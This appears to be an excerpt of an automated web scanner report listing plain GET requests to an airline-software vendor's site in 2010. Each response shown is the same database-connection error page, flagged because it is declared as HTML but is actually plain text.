HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:33:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/build_brand HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323109; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:40:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/build_brand/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322950; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:33:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/build_profit HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323072; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:38:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/build_profit/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322940; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_sell%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:32:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/downloads HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323081; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:37:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/downloads/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322946; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A4%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:31:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/downloads/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:32:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/downloads/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:31:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/downloads/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:31:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:46:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:47:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/my_list HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323116; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:41:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/sabre_airvision_network HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322910; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:30:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/sabre_airvision_network/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:30:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/commercial_planning/sabre_airvision_revenue HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_revenue/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322997; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:35:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/airport HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321948; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:36:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/downloads/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/downloads/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323057; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fairline_reservations%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A75%3A%22%2Fproducts_services%2Fcommercial_planning%2FSabre_AirVision_Market_Intelligence%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
